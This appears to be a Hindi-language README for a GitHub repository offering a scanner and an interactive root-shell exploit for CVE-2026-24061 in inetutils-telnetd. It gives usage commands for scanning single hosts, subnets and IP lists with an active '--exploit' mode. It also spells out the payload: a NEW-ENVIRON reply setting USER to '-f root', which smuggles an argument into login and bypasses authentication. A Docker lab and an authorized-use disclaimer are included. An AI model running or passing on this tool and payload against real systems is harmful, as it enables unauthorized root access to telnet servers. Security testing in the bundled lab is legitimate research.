
स्कैनर और CVE-2026-24061 के लिए इंटरैक्टिव एक्सप्लॉइट, जो inetutils-telnetd में है, जो क्राफ्टेड NEW-ENVIRON नेगोशिएशन के माध्यम से प्री-ऑथ रूट एक्सेस सक्षम करता है। इसमें मल्टी-थ्रेडेड स्कैनिंग और Docker लैब शामिल है।
👨💻 लेखक: Furkan KAYAPINAR (@FurkanKAYAPINAR)
इस रिपॉजिटरी में CVE-2026-24061 के लिए एक भेद्यता स्कैनर और एक इंटरैक्टिव एक्सप्लॉइट शामिल है। यह भेद्यता inetutils-telnetd (और संभावित रूप से अन्य Telnet कार्यान्वयन) को NEW-ENVIRON Telnet विकल्प के अनुचित हैंडलिंग के माध्यम से प्रभावित करती है, जो -f root पेलोड का उपयोग करके दूरस्थ प्री-ऑथेंटिकेशन एक्सेस की अनुमति देती है।
--exploit फ्लैग शामिल है।inetutils-telnetd का एक कमजोर संस्करण चलाने वाला एक Dockerized Ubuntu वातावरण।सुनिश्चित करें कि आपके पास Python 3.x स्थापित है।
git clone https://github.com/FurkanKAYAPINAR/CVE-2026-24061-telnet2root.git
cd CVE-2026-24061-telnet2root
## उपयोग
NEW-ENVIRON भेद्यता के लिए लक्ष्यों को स्कैन करें।
# एकल लक्ष्य को स्कैन करें
python3 scanner.py -t 192.168.1.100 -p 1903
# एक सबनेट को स्कैन करें
python3 scanner.py -s 192.168.1.0/24 -p 1903
# IP की सूची को स्कैन करें और सक्रिय शोषण का प्रयास करें (RCE जांच)
python3 scanner.py -l ips.txt -p 1903 --exploit
इंटरैक्टिव रूट शेल एक्सेस प्राप्त करें।
python3 exploit.py -t 127.0.0.1 -p 1903
परीक्षण के लिए एक स्थानीय कमजोर वातावरण तैनात करें:
cd lab
docker-compose up -d --build
यह भेद्यता Telnet नेगोशिएशन चरण के दौरान ट्रिगर होती है। सर्वर के DO NEW-ENVIRON अनुरोध का विशेष रूप से तैयार किए गए IS VAR "USER" VALUE "-f root" सब-नेगोशिएशन पैकेट के साथ जवाब देकर, सर्वर-साइड telnetd प्रक्रिया को login प्रक्रिया में -f root फ्लैग पास करने के लिए धोखा दिया जाता है, जिससे प्रमाणीकरण बायपास हो जाता है।
[!WARNING]
यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध और अनैतिक है।